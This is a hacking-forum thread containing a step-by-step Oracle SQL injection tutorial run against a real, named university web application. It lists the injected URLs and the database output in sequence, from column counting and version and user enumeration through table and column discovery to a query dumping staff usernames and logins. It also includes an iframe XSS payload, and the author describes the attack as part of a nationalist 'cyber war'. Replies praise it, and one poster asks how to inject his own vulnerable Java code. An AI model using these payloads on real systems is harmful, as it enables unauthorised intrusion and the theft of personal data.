iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (0)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
injection on Java Server Pages (jsp) based
  • schumbag
    Posts: 23
    ok,we'll trying it
    http://www.mmu.edu.my/

    it's vulnerable
    https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436

    like ussually,used a magic quotes

    https://icems.mmu.edu.my/doe/doe_detail ... 001034436'
    SQL Error - ORA-00933: SQL command not properly ended



    and like our knowing at jsp extension using an oracle for databse application
    https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=1--

    No. # Title(Specialization)
    1 Web Programming
    2 Data Mining
    3 C Programming
    4 Java Programming
    5 Web Design
    6 Visual Basic

    https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=2--


    No. # Title(Specialization)
    No record found!

    --check sum column with order by (like a mysql commands)

    https://icems.mmu.edu.my/doe/doe_detail ... 001034436' and 1=1 order by 1--
    still not error??try again!!

    https://icems.mmu.edu.my/doe/doe_detail ... 001034436' and 1=1 order by 2--

    damn!!!still not error (_ _")

    https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=1 order by 3--


    SQL Error - ORA-01785: ORDER BY item must be the number of a SELECT-list expression


    look at there,was reading!!if error at 3rd column that's mean them just 2 column have used

    https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=2 union all select 1,2--



    SQL Error - ORA-00923: FROM keyword not found where expected

    yeah,like that

    --used command table dual (default command at oracle)

    https://icems.mmu.edu.my/doe/doe_detail ... 001034436' and 1=2 union all select 1,2 from dual--

    SQL Error - ORA-01790: expression must have same datatype as corresponding expression

    dont' be confused,so why make a command table dual??
    for references go here...
    http://en.wikipedia.org/wiki/DUAL_table

    right,after thats numb we'll change with 'null' <= not used semicolon

    https://icems.mmu.edu.my/doe/doe_detail ... 001034436' and 1=2 union all select null,null from dual--
    No&#46; # Title(Specialization) 1 null

    wow sudah tidak error lagi :D
    hey,XSS bug also!!we'll try that
    https&#58;//icems&#46;mmu&#46;edu&#46;my/doe/doe_detail&#46;jsp?id=1001034436' and 1=2 union all select null, '&lt;iframe width=1000 height=700 src=http&#58;//iexploit&#46;org&gt;&lt;/iframe&gt;' FROM dual--


    but,i'll next step at jsp injection
    but this is differentwith sqlinjection using mysql for database application

    --if an oracle version checked at the inside column banner to the table v$version
    example :

    https&#58;//icems&#46;mmu&#46;edu&#46;my/doe/doe_detail&#46;jsp?id=1001034436' and 1=2 union all select null,banner FROM v$version--

    No&#46; # Title(Specialization)
    1 Oracle Database 10g Enterprise Edition Release 10&#46;2&#46;0&#46;1&#46;0 - 64bi
    2 PL/SQL Release 10&#46;2&#46;0&#46;1&#46;0 - Production
    3 CORE 10&#46;2&#46;0&#46;1&#46;0 Production
    4 TNS for Linux&#58; Version 10&#46;2&#46;0&#46;1&#46;0 - Production
    5 NLSRTL Version 10&#46;2&#46;0&#46;1&#46;0 - Production


    see??

    now,we'll check at username with commands : 
    user FROM dual--

    like this :

    https&#58;//icems&#46;mmu&#46;edu&#46;my/doe/doe_detail&#46;jsp?id=1001034436' and 1=2 union all select null,user FROM dual--

    and the username is . . .. ICEM_WEB

    look at the database:)

    https&#58;//icems&#46;mmu&#46;edu&#46;my/doe/doe_detail&#46;jsp?id=1001034436' and 1=2 union all select null,global_name FROM global_name--


    explore again!!!

    https&#58;//icems&#46;mmu&#46;edu&#46;my/doe/doe_detail&#46;jsp?id=1001034436' and 1=2 union all select null,'database--&gt;' || global_name FROM global_name--


    1 database-->ICEMS.WORLD

    maybe this one an oracle advantage, could be more neat in appearance and good looking

    if in mysql we use for combining the command string make --> concat(str1,str2)

    but at mssql we used --> str1 + str2

    but we're try at oracle --> str1 || str2


    end off,the intermezzo,now we're continous
    let we looked users at table all_users,make commands :
    username from all_users--
    example :

    https&#58;//icems&#46;mmu&#46;edu&#46;my/doe/doe_detail&#46;jsp?id=1001034436' and 1=2 union all select null,username from all_users--


    No. # Title(Specialization)
    1 SYS
    2 SYSTEM
    3 OUTLN

    *SKIP => too long
    not important :P but if you will dump it's ok
    maybe,we can got CC (lol)


    --look at all table and user... for next column table_name and owner at table all_tables

    we used again command like a before but modifying :)
    and look the result

    nama_pemilik_table-->nama_table
    https&#58;//icems&#46;mmu&#46;edu&#46;my/doe/doe_detail&#46;jsp?id=1001034436' and 1=2 union all select null,owner || '--&gt;' || table_name from all_tables--



    1 SYS--&gt;DUAL
    2 SYS--&gt;SYSTEM_PRIVILEGE_MAP
    3 SYS--&gt;TABLE_PRIVILEGE_MAP
    4 SYS--&gt;STMT_AUDIT_OPTION_MAP
    5 SYSTEM--&gt;DEF$_TEMP$LOB
    6 WMSYS--&gt;WM$WORKSPACES_TABLE
    7 WMSYS--&gt;WM$VERSION_TABLE

    *SKIP = &gt; too long

    458 ICEM_USER--&gt;ICEMS_LOGO
    459 ICEM_USER--&gt;SOSC_PAYMENT
    460 ICEM_USER--&gt;STAFF_PROFILE

    *SKIP AGAIN =&gt; too long

    524 SYSTEM--&gt;OL$
    525 SYS--&gt;WRI$_ADV_ASA_RECO_DATA
    526 ICEM_USER--&gt;EXAM_STUD_SCHEDULE_BKP
    527 ICEM_USER--&gt;OAE_QUE


    *EXPLANATION
    table all_tables this is like with information_schema.tables if at mysql injection
    they saved tables name (table_name).

    look at there this content

    ICEM_USER-->STAFF_PROFILE

    that's make me curious table STAFF_PROFILE

    -look at columns table STAFF_PROFILE --> used all_tab_columns

    this is like an information_schema.columns
    and his function saved column_name

    https&#58;//icems&#46;mmu&#46;edu&#46;my/doe/doe_detail&#46;jsp?id=1001034436' and 1=2 union all select null,column_name from all_tab_columns where table_name='STAFF_PROFILE'--

    look again the content:

    STAFF_USERNAME, STAFF_NAME sama STAFF_LOGIN

    https&#58;//icems&#46;mmu&#46;edu&#46;my/doe/doe_detail&#46;jsp?id=1001034436' and 1=2 union all select null,STAFF_USERNAME || ' &#58; ' || STAFF_NAME || ' &#58; ' || STAFF_LOGIN from STAFF_PROFILE--

    so,next step you must looking for admin page :)

    *NOTE : maybe you guys will laugh with the web since 2010 still not patching i'm attacking because of cyber war
    between indonesian vs malaysian 1 years ago *LOL
  • Sh3llc0d3
    Posts: 1,910
    Nice tutorial, interesting seeing .jsp extension being used.
  • Xin
    Posts: 3,251
    Really good tutorial nice to see a working example
    Xin
  • archit
    Posts: 1
    here is my code
              String query="select username,salary,account_no from data where account_no='"+account_id+"' ";                      
                rs = stmt.executeQuery(query);                   
               
                while ( rs.next() )
                {
                  out1.println("your account information");
                  out1.println(rs.getString(1));
                  out1.println(rs.getString(2));       
                }

    as per your method I still not getting success in sql injection
    "and 1=1 order by 3-- " is not working and everything displays properly
    ya when I put http://localhost:8080/WebApplication6/display.jsp?search_box=1000 normal output
    instead of 1000 if I use 'or'1=1 it displays all no problem but when I use search_box=1000' it gives error which it should give but still when i use order by query it displays nothing i have 4 column in my table , so what i code so i can do sql injection in it?

Add a Comment